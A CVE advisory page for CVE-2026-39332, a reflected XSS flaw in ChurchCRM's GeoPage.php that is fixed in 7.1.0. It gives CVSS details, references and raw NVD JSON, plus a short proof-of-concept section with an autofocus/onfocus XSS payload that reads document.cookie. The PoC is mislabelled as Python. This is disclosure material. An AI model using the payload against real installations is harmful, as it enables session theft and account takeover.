CVE-2026-39332

Description

ChurchCRM is an open-source church management system. Prior to 7.1.0, a reflected Cross-Site Scripting (XSS) vulnerability in GeoPage.php allows any authenticated user to inject arbitrary JavaScript into the browser of another authenticated user. Because the payload fires automatically via autofocus with no user interaction required, an attacker can steal session cookies and fully take over any victim account, including administrator accounts, by tricking them into submitting a crafted form. This vulnerability is fixed in 7.1.0.

CVSS Details

CVSS Score

8.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:* - VULNERABLE

ChurchCRM < 7.1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- PoC for CVE-2026-39332 ChurchCRM Reflected XSS -->
<!-- The vulnerability is triggered via autofocus in GeoPage.php -->
<!-- Example malicious URL parameter -->

<!-- Payload: "><input autofocus onfocus=alert(document.cookie)>
-->

<!-- HTML Injection Simulation -->
<div>
  <p>Vulnerable Input Field:</p>
  <!-- The application reflects user input here without sanitization -->
  <input type="text" value=""><input autofocus onfocus=alert('XSS_CVE-2026-39332')>">
</div>

<script>
  // Explanation: 
  // 1. The payload closes the original attribute using ">
  // 2. It injects a new input tag with 'autofocus' and 'onfocus' event handler.
  // 3. When the page loads, the browser automatically focuses on this element.
  // 4. The onfocus event executes the JavaScript, stealing cookies or performing actions.
  console.log("PoC loaded for ChurchCRM GeoPage.php XSS");
</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-39332
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-39332
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-39332/
[4] VulDB https://vuldb.com/cve/CVE-2026-39332
[5] https://github.com/ChurchCRM/CRM/security/advisories/GHSA-hc6g-h48v-wqvq

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-39332", "sourceIdentifier": "[email protected]", "published": "2026-04-07T18:16:44.717", "lastModified": "2026-04-10T20:58:07.087", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ChurchCRM is an open-source church management system. Prior to 7.1.0, a reflected Cross-Site Scripting (XSS) vulnerability in GeoPage.php allows any authenticated user to inject arbitrary JavaScript into the browser of another authenticated user. Because the payload fires automatically via autofocus with no user interaction required, an attacker can steal session cookies and fully take over any victim account, including administrator accounts, by tricking them into submitting a crafted form. This vulnerability is fixed in 7.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.1.0", "matchCriteriaId": "BF846F61-0C1E-49AB-B691-A01937A6C24D"}]}]}], "references": [{"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-hc6g-h48v-wqvq", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}